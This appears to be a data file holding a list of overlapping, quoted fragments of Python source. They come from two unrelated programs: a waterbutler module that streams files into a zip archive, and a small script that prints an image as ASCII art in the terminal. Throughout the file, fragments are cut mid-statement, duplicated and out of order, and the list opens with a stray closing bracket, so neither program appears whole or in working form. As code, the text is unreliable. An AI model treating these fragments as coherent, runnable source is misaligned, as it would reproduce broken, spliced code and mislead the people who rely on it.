"self.stream = stream self._buffer = bytearray() super().__init__(*args, **kwargs) @property def size(self): return 0",
"self.compressed_size = 0 super().__init__( StringStream(self.local_header), ZipLocalFileData(self, stream), ZipLocalFileDescriptor(self), ) @property def local_header(self): \"\"\"The",
"file @property def size(self): return 0 @asyncio.coroutine def _read(self, *args, **kwargs): \"\"\"Create 16",
"return self.zinfo.FileHeader(zip64=False) @property def directory_header(self): \"\"\"The file's header, for inclusion in the archive's",
"self.zinfo.comment @property def descriptor(self): \"\"\"Local file data descriptor\"\"\" fmt = '<4sLLL' signature =",
"ZipStreamReader, and should not be used separately \"\"\" def __init__(self, files, *args, **kwargs):",
"struct.pack( fmt, signature, self.zinfo.CRC, self.compressed_size, self.original_size, ) @property def total_bytes(self): \"\"\"Length, in bytes,",
"empty if not self._buffer and self.stream.at_eof(): self.feed_eof() return bytes(ret) class ZipLocalFile(MultiStream): \"\"\"A local",
"self.zinfo.internal_attr, self.zinfo.external_attr, self.zinfo.header_offset, ) return centdir + filename + extra_data + self.zinfo.comment @property",
") self.feed_eof() return b''.join((file_headers, endrec)) class ZipStreamReader(MultiStream): \"\"\"Combines one or more streams into",
"be used separately \"\"\" def __init__(self, file, stream, *args, **kwargs): self.file = file",
"for each in streams] # Append a stream for the archive's footer (central",
"and compress size\"\"\" self._eof = True return self.file.descriptor class ZipLocalFileData(BaseStream): \"\"\"A thin stream",
"callable(self.stream): self.stream = yield from (self.stream()) ret = self._buffer while (n == -1",
"+= file.total_bytes file_headers = b''.join(file_headers) count = len(self.files) endrec = struct.pack( zipfile.structEndArchive, zipfile.stringEndArchive,",
"_read(self, n=-1): file_headers = [] cumulative_offset = 0 for file in self.files: file.zinfo.header_offset",
"zipfile.stringEndArchive, 0, 0, count, count, len(file_headers), cumulative_offset, 0, ) self.feed_eof() return b''.join((file_headers, endrec))",
"data descriptor return struct.pack( fmt, signature, self.zinfo.CRC, self.compressed_size, self.original_size, ) @property def total_bytes(self):",
"ZipLocalFileDescriptor(BaseStream): \"\"\"The descriptor (footer) for a local file in a zip archive Note:",
"self.zinfo._encodeFilenameFlags() centdir = struct.pack( zipfile.structCentralDir, zipfile.stringCentralDir, self.zinfo.create_version, self.zinfo.create_system, self.zinfo.extract_version, self.zinfo.reserved, flag_bits, self.zinfo.compress_type, dostime,",
"len(self.zinfo.filename.encode('utf-8')), len(extra_data), len(self.zinfo.comment), 0, self.zinfo.internal_attr, self.zinfo.external_attr, self.zinfo.header_offset, ) return centdir + filename +",
"footer self.zinfo = zipfile.ZipInfo( filename=filename, date_time=time.localtime(time.time())[:6], ) self.zinfo.compress_type = zipfile.ZIP_DEFLATED self.zinfo.external_attr = 0o600",
"// 2) extra_data = self.zinfo.extra filename, flag_bits = self.zinfo._encodeFilenameFlags() centdir = struct.pack( zipfile.structCentralDir,",
"file_headers.append(file.directory_header) cumulative_offset += file.total_bytes file_headers = b''.join(file_headers) count = len(self.files) endrec = struct.pack(",
"= binascii.crc32(chunk, self.file.zinfo.CRC) # compress compressed = self.file.compressor.compress(chunk) compressed += self.file.compressor.flush( zlib.Z_FINISH if",
"+= len(compressed) ret += compressed # buffer any overages if n != -1",
"self._buffer = ret[n:] ret = ret[:n] else: self._buffer = bytearray() # EOF is",
"files @property def size(self): return 0 @asyncio.coroutine def _read(self, n=-1): file_headers = []",
"= yield from self.stream.read(n, *args, **kwargs) # Update file info self.file.original_size += len(chunk)",
"0o600 << 16 self.zinfo.header_offset = 0 self.zinfo.flag_bits |= 0x08 # Initial CRC: value",
"dostime = dt[3] << 11 | dt[4] << 5 | (dt[5] // 2)",
"self.zinfo.CRC = 0 # define a compressor self.compressor = zlib.compressobj( zlib.Z_DEFAULT_COMPRESSION, zlib.DEFLATED, -15,",
"flag_bits, self.zinfo.compress_type, dostime, # modification time dosdate, self.zinfo.CRC, self.compressed_size, self.original_size, len(self.zinfo.filename.encode('utf-8')), len(extra_data), len(self.zinfo.comment),",
"footer Note: This should be access after the file's data has been streamed.",
"return 0 @asyncio.coroutine def _read(self, n=-1): file_headers = [] cumulative_offset = 0 for",
"= zipfile.ZipInfo( filename=filename, date_time=time.localtime(time.time())[:6], ) self.zinfo.compress_type = zipfile.ZIP_DEFLATED self.zinfo.external_attr = 0o600 << 16",
"self.zinfo.CRC, self.compressed_size, self.original_size, len(self.zinfo.filename.encode('utf-8')), len(extra_data), len(self.zinfo.comment), 0, self.zinfo.internal_attr, self.zinfo.external_attr, self.zinfo.header_offset, ) return centdir",
"streams into a single, Zip-compressed stream\"\"\" def __init__(self, *streams): # Each incoming stream",
"compressed # buffer any overages if n != -1 and len(ret) > n:",
"This should be access after the file's data has been streamed. \"\"\" return",
"self.original_size, len(self.zinfo.filename.encode('utf-8')), len(extra_data), len(self.zinfo.comment), 0, self.zinfo.internal_attr, self.zinfo.external_attr, self.zinfo.header_offset, ) return centdir + filename",
"self.feed_eof() return b''.join((file_headers, endrec)) class ZipStreamReader(MultiStream): \"\"\"Combines one or more streams into a",
"bytes, of output. Includes header and footer Note: This should be access after",
"the archive's central directory \"\"\" dt = self.zinfo.date_time # modification date/time, in MSDOS",
"has been streamed. \"\"\" return ( len(self.local_header) + self.compressed_size + len(self.descriptor) ) class",
"| dt[1] << 5 | dt[2] dostime = dt[3] << 11 | dt[4]",
"import StringStream class ZipLocalFileDescriptor(BaseStream): \"\"\"The descriptor (footer) for a local file in a",
"Note: This class is tightly coupled to ZipStreamReader, and should not be used",
"value will be updated as file is streamed self.zinfo.CRC = 0 # define",
"ret[n:] ret = ret[:n] else: self._buffer = bytearray() # EOF is the buffer",
"are both empty if not self._buffer and self.stream.at_eof(): self.feed_eof() return bytes(ret) class ZipLocalFile(MultiStream):",
"for data descriptor return struct.pack( fmt, signature, self.zinfo.CRC, self.compressed_size, self.original_size, ) @property def",
"\"\"\"The file's header, for inclusion in the archive's central directory \"\"\" dt =",
"= filename.strip('/') # Build a ZipInfo instance to use for the file's header",
"used separately \"\"\" def __init__(self, file, stream, *args, **kwargs): self.file = file self.stream",
"+= compressed # buffer any overages if n != -1 and len(ret) >",
"zlib.Z_FINISH if self.stream.at_eof() else zlib.Z_SYNC_FLUSH ) # Update file info self.file.compressed_size += len(compressed)",
"streams = [ZipLocalFile(each) for each in streams] # Append a stream for the",
"into a single, Zip-compressed stream\"\"\" def __init__(self, *streams): # Each incoming stream should",
"directory for a zip archive Note: This class is tightly coupled to ZipStreamReader,",
"and footer self.zinfo = zipfile.ZipInfo( filename=filename, date_time=time.localtime(time.time())[:6], ) self.zinfo.compress_type = zipfile.ZIP_DEFLATED self.zinfo.external_attr =",
"self.file.compressed_size += len(compressed) ret += compressed # buffer any overages if n !=",
"stream\"\"\" def __init__(self, *streams): # Each incoming stream should be wrapped in a",
"= struct.pack( zipfile.structEndArchive, zipfile.stringEndArchive, 0, 0, count, count, len(file_headers), cumulative_offset, 0, ) self.feed_eof()",
"coupled to ZipStreamReader, and should not be used separately \"\"\" def __init__(self, files,",
"5 | (dt[5] // 2) extra_data = self.zinfo.extra filename, flag_bits = self.zinfo._encodeFilenameFlags() centdir",
"= ret[:n] else: self._buffer = bytearray() # EOF is the buffer and stream",
"output. Includes header and footer Note: This should be access after the file's",
"magic number for data descriptor return struct.pack( fmt, signature, self.zinfo.CRC, self.compressed_size, self.original_size, )",
"coupled to ZipStreamReader, and should not be used separately \"\"\" def __init__(self, file):",
"not be used separately \"\"\" def __init__(self, file): super().__init__() self.file = file @property",
"should not be used separately \"\"\" def __init__(self, file_tuple): filename, stream = file_tuple",
"data descriptor\"\"\" fmt = '<4sLLL' signature = b'PK\\x07\\x08' # magic number for data",
"dt[3] << 11 | dt[4] << 5 | (dt[5] // 2) extra_data =",
"or len(ret) < n) and not self.stream.at_eof(): chunk = yield from self.stream.read(n, *args,",
"= True return self.file.descriptor class ZipLocalFileData(BaseStream): \"\"\"A thin stream wrapper, used to update",
"\"\"\"Create 16 byte descriptor of file CRC, file size, and compress size\"\"\" self._eof",
"def descriptor(self): \"\"\"Local file data descriptor\"\"\" fmt = '<4sLLL' signature = b'PK\\x07\\x08' #",
"filename=filename, date_time=time.localtime(time.time())[:6], ) self.zinfo.compress_type = zipfile.ZIP_DEFLATED self.zinfo.external_attr = 0o600 << 16 self.zinfo.header_offset =",
"filename = filename.strip('/') # Build a ZipInfo instance to use for the file's",
"+ filename + extra_data + self.zinfo.comment @property def descriptor(self): \"\"\"Local file data descriptor\"\"\"",
"= self.zinfo._encodeFilenameFlags() centdir = struct.pack( zipfile.structCentralDir, zipfile.stringCentralDir, self.zinfo.create_version, self.zinfo.create_system, self.zinfo.extract_version, self.zinfo.reserved, flag_bits, self.zinfo.compress_type,",
"len(chunk) self.file.zinfo.CRC = binascii.crc32(chunk, self.file.zinfo.CRC) # compress compressed = self.file.compressor.compress(chunk) compressed += self.file.compressor.flush(",
"= zipfile.ZIP_DEFLATED self.zinfo.external_attr = 0o600 << 16 self.zinfo.header_offset = 0 self.zinfo.flag_bits |= 0x08",
") self.zinfo.compress_type = zipfile.ZIP_DEFLATED self.zinfo.external_attr = 0o600 << 16 self.zinfo.header_offset = 0 self.zinfo.flag_bits",
"just before the content stream\"\"\" return self.zinfo.FileHeader(zip64=False) @property def directory_header(self): \"\"\"The file's header,",
"bytearray() super().__init__(*args, **kwargs) @property def size(self): return 0 @asyncio.coroutine def _read(self, n=-1, *args,",
"zipfile import zlib from waterbutler.core.streams import BaseStream from waterbutler.core.streams import MultiStream from waterbutler.core.streams",
"dosdate = (dt[0] - 1980) << 9 | dt[1] << 5 | dt[2]",
"def size(self): return 0 @asyncio.coroutine def _read(self, n=-1): file_headers = [] cumulative_offset =",
"\"\"\" return ( len(self.local_header) + self.compressed_size + len(self.descriptor) ) class ZipArchiveCentralDirectory(BaseStream): \"\"\"The central",
"format dosdate = (dt[0] - 1980) << 9 | dt[1] << 5 |",
"= files @property def size(self): return 0 @asyncio.coroutine def _read(self, n=-1): file_headers =",
"\"\"\" def __init__(self, file, stream, *args, **kwargs): self.file = file self.stream = stream",
"= stream self._buffer = bytearray() super().__init__(*args, **kwargs) @property def size(self): return 0 @asyncio.coroutine",
"0 self.compressed_size = 0 super().__init__( StringStream(self.local_header), ZipLocalFileData(self, stream), ZipLocalFileDescriptor(self), ) @property def local_header(self):",
"file data descriptor\"\"\" fmt = '<4sLLL' signature = b'PK\\x07\\x08' # magic number for",
"update a ZipLocalFile as chunks are read Note: This class is tightly coupled",
"a compressor self.compressor = zlib.compressobj( zlib.Z_DEFAULT_COMPRESSION, zlib.DEFLATED, -15, ) # meta information -",
"self.file.descriptor class ZipLocalFileData(BaseStream): \"\"\"A thin stream wrapper, used to update a ZipLocalFile as",
"self.file.original_size += len(chunk) self.file.zinfo.CRC = binascii.crc32(chunk, self.file.zinfo.CRC) # compress compressed = self.file.compressor.compress(chunk) compressed",
"@property def total_bytes(self): \"\"\"Length, in bytes, of output. Includes header and footer Note:",
"!= -1 and len(ret) > n: self._buffer = ret[n:] ret = ret[:n] else:",
"streamed. \"\"\" return ( len(self.local_header) + self.compressed_size + len(self.descriptor) ) class ZipArchiveCentralDirectory(BaseStream): \"\"\"The",
"dt[2] dostime = dt[3] << 11 | dt[4] << 5 | (dt[5] //",
"# Update file info self.file.original_size += len(chunk) self.file.zinfo.CRC = binascii.crc32(chunk, self.file.zinfo.CRC) # compress",
"self.zinfo.header_offset, ) return centdir + filename + extra_data + self.zinfo.comment @property def descriptor(self):",
"and stream are both empty if not self._buffer and self.stream.at_eof(): self.feed_eof() return bytes(ret)",
"MultiStream from waterbutler.core.streams import StringStream class ZipLocalFileDescriptor(BaseStream): \"\"\"The descriptor (footer) for a local",
"a ZipLocalFile as chunks are read Note: This class is tightly coupled to",
"are read Note: This class is tightly coupled to ZipStreamReader, and should not",
"ZipStreamReader, and should not be used separately \"\"\" def __init__(self, file_tuple): filename, stream",
"__init__(self, *streams): # Each incoming stream should be wrapped in a _ZipFile instance",
"stream = file_tuple filename = filename.strip('/') # Build a ZipInfo instance to use",
"<< 16 self.zinfo.header_offset = 0 self.zinfo.flag_bits |= 0x08 # Initial CRC: value will",
"+= self.file.compressor.flush( zlib.Z_FINISH if self.stream.at_eof() else zlib.Z_SYNC_FLUSH ) # Update file info self.file.compressed_size",
"single, Zip-compressed stream\"\"\" def __init__(self, *streams): # Each incoming stream should be wrapped",
"class ZipLocalFile(MultiStream): \"\"\"A local file in a zip archive Note: This class is",
"- needed to build the footer self.original_size = 0 self.compressed_size = 0 super().__init__(",
"b''.join((file_headers, endrec)) class ZipStreamReader(MultiStream): \"\"\"Combines one or more streams into a single, Zip-compressed",
"and should not be used separately \"\"\" def __init__(self, files, *args, **kwargs): super().__init__()",
"used separately \"\"\" def __init__(self, files, *args, **kwargs): super().__init__() self.files = files @property",
"dostime, # modification time dosdate, self.zinfo.CRC, self.compressed_size, self.original_size, len(self.zinfo.filename.encode('utf-8')), len(extra_data), len(self.zinfo.comment), 0, self.zinfo.internal_attr,",
"len(compressed) ret += compressed # buffer any overages if n != -1 and"
] |
[
"return img.resize((width, height)) def draw_ascii(img): \"\"\" draw ascii art from the provided image",
"x in range(width): if img.getpixel((x, y)) < 15: print('# ', end='') else: print('.",
"def get_aspect_ratio(img): \"\"\" return the aspect ratio of given image ar = width//height",
"black and white img = img.convert('L') # resize image to match terminal width",
"image ar = width//height return an int, we don't care about exact ratios",
"draw ascii art from the provided image use # for black use .",
"# resize image to match terminal width and aspect ratio img = resize_img(img)",
"in range(height): for x in range(width): if img.getpixel((x, y)) < 15: print('# ',",
"width this function depends upon shutil.get_terminal_size this works only on Python >= 3.3",
"upon shutil.get_terminal_size this works only on Python >= 3.3 \"\"\" return shutil.get_terminal_size().columns def",
"according to terminal width \"\"\" # convert image to black and white img",
"resize_img(img) width, height = img.size for y in range(height): for x in range(width):",
"img.convert('L') # resize image to match terminal width and aspect ratio img =",
"it according to terminal width \"\"\" # convert image to black and white",
"a resized image resize acc. to given terminal width keeping in mind the",
"and white img = img.convert('L') # resize image to match terminal width and",
"def get_term_width(): \"\"\" return terminal width this function depends upon shutil.get_terminal_size this works",
"care about exact ratios \"\"\" width, height = img.size aspect_ratio = width//height if",
"get_aspect_ratio(img): \"\"\" return the aspect ratio of given image ar = width//height return",
"# divide by 2 because we use 2 characters per pixel width =",
"by 2 because we use 2 characters per pixel width = term_width//2 aspect_ratio",
"= resize_img(img) width, height = img.size for y in range(height): for x in",
"range(width): if img.getpixel((x, y)) < 15: print('# ', end='') else: print('. ', end='')",
"convert image to black and white img = img.convert('L') # resize image to",
"print('# ', end='') else: print('. ', end='') print() if __name__ == '__main__': if",
"= get_height(width, aspect_ratio) return img.resize((width, height)) def draw_ascii(img): \"\"\" draw ascii art from",
"img.size aspect_ratio = width//height if aspect_ratio == 0: aspect_ratio = 1 return aspect_ratio",
"\"\"\" draw ascii art from the provided image use # for black use",
"Image def get_term_width(): \"\"\" return terminal width this function depends upon shutil.get_terminal_size this",
"def draw_ascii(img): \"\"\" draw ascii art from the provided image use # for",
"resize it according to terminal width \"\"\" # convert image to black and",
"if len(sys.argv) < 2: print('Please enter an image name as argument') sys.exit(1) img_file",
"< 2: print('Please enter an image name as argument') sys.exit(1) img_file = sys.argv[1]",
"height with respect to given aspect ratio \"\"\" return width//aspect_ratio def resize_img(img): \"\"\"",
"given image ar = width//height return an int, we don't care about exact",
"width and aspect ratio img = resize_img(img) width, height = img.size for y",
"black use . for white before drawing, convert the image to black and",
"= width//height return an int, we don't care about exact ratios \"\"\" width,",
"original aspect ratio \"\"\" term_width = get_term_width() # divide by 2 because we",
"ratio \"\"\" return width//aspect_ratio def resize_img(img): \"\"\" return a resized image resize acc.",
"name as argument') sys.exit(1) img_file = sys.argv[1] try: img = Image.open(img_file) draw_ascii(img) except",
"else: print('. ', end='') print() if __name__ == '__main__': if len(sys.argv) < 2:",
"img.resize((width, height)) def draw_ascii(img): \"\"\" draw ascii art from the provided image use",
"= 1 return aspect_ratio def get_height(width, aspect_ratio): \"\"\" return height with respect to",
"= img.size aspect_ratio = width//height if aspect_ratio == 0: aspect_ratio = 1 return",
"0: aspect_ratio = 1 return aspect_ratio def get_height(width, aspect_ratio): \"\"\" return height with",
"y)) < 15: print('# ', end='') else: print('. ', end='') print() if __name__",
"2 because we use 2 characters per pixel width = term_width//2 aspect_ratio =",
"def resize_img(img): \"\"\" return a resized image resize acc. to given terminal width",
"def get_height(width, aspect_ratio): \"\"\" return height with respect to given aspect ratio \"\"\"",
"get_height(width, aspect_ratio): \"\"\" return height with respect to given aspect ratio \"\"\" return",
"= term_width//2 aspect_ratio = get_aspect_ratio(img) height = get_height(width, aspect_ratio) return img.resize((width, height)) def",
"mind the original aspect ratio \"\"\" term_width = get_term_width() # divide by 2",
"we don't care about exact ratios \"\"\" width, height = img.size aspect_ratio =",
"return terminal width this function depends upon shutil.get_terminal_size this works only on Python",
"get_term_width(): \"\"\" return terminal width this function depends upon shutil.get_terminal_size this works only",
"on Python >= 3.3 \"\"\" return shutil.get_terminal_size().columns def get_aspect_ratio(img): \"\"\" return the aspect",
"aspect ratio \"\"\" return width//aspect_ratio def resize_img(img): \"\"\" return a resized image resize",
"\"\"\" return a resized image resize acc. to given terminal width keeping in",
"PIL import Image def get_term_width(): \"\"\" return terminal width this function depends upon",
"argument') sys.exit(1) img_file = sys.argv[1] try: img = Image.open(img_file) draw_ascii(img) except IOError: print('Enter",
"keeping in mind the original aspect ratio \"\"\" term_width = get_term_width() # divide",
"shutil.get_terminal_size this works only on Python >= 3.3 \"\"\" return shutil.get_terminal_size().columns def get_aspect_ratio(img):",
"then resize it according to terminal width \"\"\" # convert image to black",
"the image to black and white then resize it according to terminal width",
"in range(width): if img.getpixel((x, y)) < 15: print('# ', end='') else: print('. ',",
"image to black and white img = img.convert('L') # resize image to match",
"and white then resize it according to terminal width \"\"\" # convert image",
"print('. ', end='') print() if __name__ == '__main__': if len(sys.argv) < 2: print('Please",
"= img.size for y in range(height): for x in range(width): if img.getpixel((x, y))",
"= img.convert('L') # resize image to match terminal width and aspect ratio img",
"\"\"\" return shutil.get_terminal_size().columns def get_aspect_ratio(img): \"\"\" return the aspect ratio of given image",
"get_aspect_ratio(img) height = get_height(width, aspect_ratio) return img.resize((width, height)) def draw_ascii(img): \"\"\" draw ascii",
"return a resized image resize acc. to given terminal width keeping in mind",
"pixel width = term_width//2 aspect_ratio = get_aspect_ratio(img) height = get_height(width, aspect_ratio) return img.resize((width,",
"width, height = img.size for y in range(height): for x in range(width): if",
"resized image resize acc. to given terminal width keeping in mind the original",
"img.size for y in range(height): for x in range(width): if img.getpixel((x, y)) <",
"an image name as argument') sys.exit(1) img_file = sys.argv[1] try: img = Image.open(img_file)",
"ratio of given image ar = width//height return an int, we don't care",
"width = term_width//2 aspect_ratio = get_aspect_ratio(img) height = get_height(width, aspect_ratio) return img.resize((width, height))",
"depends upon shutil.get_terminal_size this works only on Python >= 3.3 \"\"\" return shutil.get_terminal_size().columns",
"sys from PIL import Image def get_term_width(): \"\"\" return terminal width this function",
"get_height(width, aspect_ratio) return img.resize((width, height)) def draw_ascii(img): \"\"\" draw ascii art from the",
"img = img.convert('L') # resize image to match terminal width and aspect ratio",
"exact ratios \"\"\" width, height = img.size aspect_ratio = width//height if aspect_ratio ==",
"print('Please enter an image name as argument') sys.exit(1) img_file = sys.argv[1] try: img",
"width//aspect_ratio def resize_img(img): \"\"\" return a resized image resize acc. to given terminal",
"terminal width \"\"\" # convert image to black and white img = img.convert('L')",
"len(sys.argv) < 2: print('Please enter an image name as argument') sys.exit(1) img_file =",
"given terminal width keeping in mind the original aspect ratio \"\"\" term_width =",
"\"\"\" return width//aspect_ratio def resize_img(img): \"\"\" return a resized image resize acc. to",
"and aspect ratio img = resize_img(img) width, height = img.size for y in",
"to black and white then resize it according to terminal width \"\"\" #",
"to black and white img = img.convert('L') # resize image to match terminal",
"only on Python >= 3.3 \"\"\" return shutil.get_terminal_size().columns def get_aspect_ratio(img): \"\"\" return the",
"2 characters per pixel width = term_width//2 aspect_ratio = get_aspect_ratio(img) height = get_height(width,",
"white before drawing, convert the image to black and white then resize it",
"to terminal width \"\"\" # convert image to black and white img =",
". for white before drawing, convert the image to black and white then",
"aspect_ratio = 1 return aspect_ratio def get_height(width, aspect_ratio): \"\"\" return height with respect",
"return aspect_ratio def get_height(width, aspect_ratio): \"\"\" return height with respect to given aspect",
"15: print('# ', end='') else: print('. ', end='') print() if __name__ == '__main__':",
"import Image def get_term_width(): \"\"\" return terminal width this function depends upon shutil.get_terminal_size",
"this works only on Python >= 3.3 \"\"\" return shutil.get_terminal_size().columns def get_aspect_ratio(img): \"\"\"",
"shutil.get_terminal_size().columns def get_aspect_ratio(img): \"\"\" return the aspect ratio of given image ar =",
"width keeping in mind the original aspect ratio \"\"\" term_width = get_term_width() #",
"respect to given aspect ratio \"\"\" return width//aspect_ratio def resize_img(img): \"\"\" return a",
"# convert image to black and white img = img.convert('L') # resize image",
"term_width = get_term_width() # divide by 2 because we use 2 characters per",
"int, we don't care about exact ratios \"\"\" width, height = img.size aspect_ratio",
"return an int, we don't care about exact ratios \"\"\" width, height =",
"import shutil import sys from PIL import Image def get_term_width(): \"\"\" return terminal",
">= 3.3 \"\"\" return shutil.get_terminal_size().columns def get_aspect_ratio(img): \"\"\" return the aspect ratio of",
"ar = width//height return an int, we don't care about exact ratios \"\"\"",
"to given terminal width keeping in mind the original aspect ratio \"\"\" term_width",
"if __name__ == '__main__': if len(sys.argv) < 2: print('Please enter an image name",
"convert the image to black and white then resize it according to terminal",
"sys.exit(1) img_file = sys.argv[1] try: img = Image.open(img_file) draw_ascii(img) except IOError: print('Enter correct",
"resize image to match terminal width and aspect ratio img = resize_img(img) width,",
"aspect_ratio) return img.resize((width, height)) def draw_ascii(img): \"\"\" draw ascii art from the provided",
"before drawing, convert the image to black and white then resize it according",
"image name as argument') sys.exit(1) img_file = sys.argv[1] try: img = Image.open(img_file) draw_ascii(img)",
"white then resize it according to terminal width \"\"\" # convert image to",
"image to match terminal width and aspect ratio img = resize_img(img) width, height",
"characters per pixel width = term_width//2 aspect_ratio = get_aspect_ratio(img) height = get_height(width, aspect_ratio)",
"in mind the original aspect ratio \"\"\" term_width = get_term_width() # divide by",
"aspect_ratio def get_height(width, aspect_ratio): \"\"\" return height with respect to given aspect ratio",
"aspect ratio \"\"\" term_width = get_term_width() # divide by 2 because we use",
"== '__main__': if len(sys.argv) < 2: print('Please enter an image name as argument')",
"\"\"\" return height with respect to given aspect ratio \"\"\" return width//aspect_ratio def",
"width//height return an int, we don't care about exact ratios \"\"\" width, height",
"aspect_ratio = width//height if aspect_ratio == 0: aspect_ratio = 1 return aspect_ratio def",
"drawing, convert the image to black and white then resize it according to",
"we use 2 characters per pixel width = term_width//2 aspect_ratio = get_aspect_ratio(img) height",
"use 2 characters per pixel width = term_width//2 aspect_ratio = get_aspect_ratio(img) height =",
"y in range(height): for x in range(width): if img.getpixel((x, y)) < 15: print('#",
"because we use 2 characters per pixel width = term_width//2 aspect_ratio = get_aspect_ratio(img)",
"print() if __name__ == '__main__': if len(sys.argv) < 2: print('Please enter an image",
"use # for black use . for white before drawing, convert the image",
"__name__ == '__main__': if len(sys.argv) < 2: print('Please enter an image name as",
"an int, we don't care about exact ratios \"\"\" width, height = img.size",
"for y in range(height): for x in range(width): if img.getpixel((x, y)) < 15:",
"= sys.argv[1] try: img = Image.open(img_file) draw_ascii(img) except IOError: print('Enter correct file') sys.exit(1)",
"height = img.size aspect_ratio = width//height if aspect_ratio == 0: aspect_ratio = 1",
"acc. to given terminal width keeping in mind the original aspect ratio \"\"\"",
"from PIL import Image def get_term_width(): \"\"\" return terminal width this function depends",
"range(height): for x in range(width): if img.getpixel((x, y)) < 15: print('# ', end='')",
"to match terminal width and aspect ratio img = resize_img(img) width, height =",
"height = get_height(width, aspect_ratio) return img.resize((width, height)) def draw_ascii(img): \"\"\" draw ascii art",
"aspect_ratio = get_aspect_ratio(img) height = get_height(width, aspect_ratio) return img.resize((width, height)) def draw_ascii(img): \"\"\"",
"\"\"\" term_width = get_term_width() # divide by 2 because we use 2 characters",
"for white before drawing, convert the image to black and white then resize",
"if aspect_ratio == 0: aspect_ratio = 1 return aspect_ratio def get_height(width, aspect_ratio): \"\"\"",
"width//height if aspect_ratio == 0: aspect_ratio = 1 return aspect_ratio def get_height(width, aspect_ratio):",
"img.getpixel((x, y)) < 15: print('# ', end='') else: print('. ', end='') print() if",
"to given aspect ratio \"\"\" return width//aspect_ratio def resize_img(img): \"\"\" return a resized",
"aspect ratio img = resize_img(img) width, height = img.size for y in range(height):",
"for x in range(width): if img.getpixel((x, y)) < 15: print('# ', end='') else:",
"return the aspect ratio of given image ar = width//height return an int,",
"function depends upon shutil.get_terminal_size this works only on Python >= 3.3 \"\"\" return",
"\"\"\" width, height = img.size aspect_ratio = width//height if aspect_ratio == 0: aspect_ratio",
"black and white then resize it according to terminal width \"\"\" # convert",
"width, height = img.size aspect_ratio = width//height if aspect_ratio == 0: aspect_ratio =",
"', end='') else: print('. ', end='') print() if __name__ == '__main__': if len(sys.argv)",
"width \"\"\" # convert image to black and white img = img.convert('L') #",
"2: print('Please enter an image name as argument') sys.exit(1) img_file = sys.argv[1] try:",
"works only on Python >= 3.3 \"\"\" return shutil.get_terminal_size().columns def get_aspect_ratio(img): \"\"\" return",
"ratio img = resize_img(img) width, height = img.size for y in range(height): for",
"== 0: aspect_ratio = 1 return aspect_ratio def get_height(width, aspect_ratio): \"\"\" return height",
"', end='') print() if __name__ == '__main__': if len(sys.argv) < 2: print('Please enter",
"end='') print() if __name__ == '__main__': if len(sys.argv) < 2: print('Please enter an",
"of given image ar = width//height return an int, we don't care about",
"= width//height if aspect_ratio == 0: aspect_ratio = 1 return aspect_ratio def get_height(width,",
"\"\"\" return terminal width this function depends upon shutil.get_terminal_size this works only on",
"Python >= 3.3 \"\"\" return shutil.get_terminal_size().columns def get_aspect_ratio(img): \"\"\" return the aspect ratio",
"get_term_width() # divide by 2 because we use 2 characters per pixel width",
"art from the provided image use # for black use . for white",
"the aspect ratio of given image ar = width//height return an int, we",
"end='') else: print('. ', end='') print() if __name__ == '__main__': if len(sys.argv) <",
"'__main__': if len(sys.argv) < 2: print('Please enter an image name as argument') sys.exit(1)",
"use . for white before drawing, convert the image to black and white",
"provided image use # for black use . for white before drawing, convert",
"for black use . for white before drawing, convert the image to black",
"terminal width this function depends upon shutil.get_terminal_size this works only on Python >=",
"ratio \"\"\" term_width = get_term_width() # divide by 2 because we use 2",
"draw_ascii(img): \"\"\" draw ascii art from the provided image use # for black",
"# for black use . for white before drawing, convert the image to",
"aspect_ratio == 0: aspect_ratio = 1 return aspect_ratio def get_height(width, aspect_ratio): \"\"\" return",
"white img = img.convert('L') # resize image to match terminal width and aspect",
"term_width//2 aspect_ratio = get_aspect_ratio(img) height = get_height(width, aspect_ratio) return img.resize((width, height)) def draw_ascii(img):",
"height)) def draw_ascii(img): \"\"\" draw ascii art from the provided image use #",
"3.3 \"\"\" return shutil.get_terminal_size().columns def get_aspect_ratio(img): \"\"\" return the aspect ratio of given",
"import sys from PIL import Image def get_term_width(): \"\"\" return terminal width this",
"1 return aspect_ratio def get_height(width, aspect_ratio): \"\"\" return height with respect to given",
"match terminal width and aspect ratio img = resize_img(img) width, height = img.size",
"divide by 2 because we use 2 characters per pixel width = term_width//2",
"resize acc. to given terminal width keeping in mind the original aspect ratio",
"\"\"\" return the aspect ratio of given image ar = width//height return an",
"img = resize_img(img) width, height = img.size for y in range(height): for x",
"resize_img(img): \"\"\" return a resized image resize acc. to given terminal width keeping",
"terminal width and aspect ratio img = resize_img(img) width, height = img.size for",
"< 15: print('# ', end='') else: print('. ', end='') print() if __name__ ==",
"don't care about exact ratios \"\"\" width, height = img.size aspect_ratio = width//height",
"\"\"\" # convert image to black and white img = img.convert('L') # resize",
"height = img.size for y in range(height): for x in range(width): if img.getpixel((x,",
"return shutil.get_terminal_size().columns def get_aspect_ratio(img): \"\"\" return the aspect ratio of given image ar",
"image resize acc. to given terminal width keeping in mind the original aspect",
"given aspect ratio \"\"\" return width//aspect_ratio def resize_img(img): \"\"\" return a resized image",
"as argument') sys.exit(1) img_file = sys.argv[1] try: img = Image.open(img_file) draw_ascii(img) except IOError:",
"ascii art from the provided image use # for black use . for",
"= get_term_width() # divide by 2 because we use 2 characters per pixel",
"image use # for black use . for white before drawing, convert the",
"enter an image name as argument') sys.exit(1) img_file = sys.argv[1] try: img =",
"img_file = sys.argv[1] try: img = Image.open(img_file) draw_ascii(img) except IOError: print('Enter correct file')",
"shutil import sys from PIL import Image def get_term_width(): \"\"\" return terminal width",
"about exact ratios \"\"\" width, height = img.size aspect_ratio = width//height if aspect_ratio",
"if img.getpixel((x, y)) < 15: print('# ', end='') else: print('. ', end='') print()",
"aspect ratio of given image ar = width//height return an int, we don't",
"return width//aspect_ratio def resize_img(img): \"\"\" return a resized image resize acc. to given",
"per pixel width = term_width//2 aspect_ratio = get_aspect_ratio(img) height = get_height(width, aspect_ratio) return",
"= get_aspect_ratio(img) height = get_height(width, aspect_ratio) return img.resize((width, height)) def draw_ascii(img): \"\"\" draw",
"from the provided image use # for black use . for white before",
"return height with respect to given aspect ratio \"\"\" return width//aspect_ratio def resize_img(img):",
"ratios \"\"\" width, height = img.size aspect_ratio = width//height if aspect_ratio == 0:",
"terminal width keeping in mind the original aspect ratio \"\"\" term_width = get_term_width()",
"the provided image use # for black use . for white before drawing,",
"image to black and white then resize it according to terminal width \"\"\"",
"with respect to given aspect ratio \"\"\" return width//aspect_ratio def resize_img(img): \"\"\" return",
"aspect_ratio): \"\"\" return height with respect to given aspect ratio \"\"\" return width//aspect_ratio",
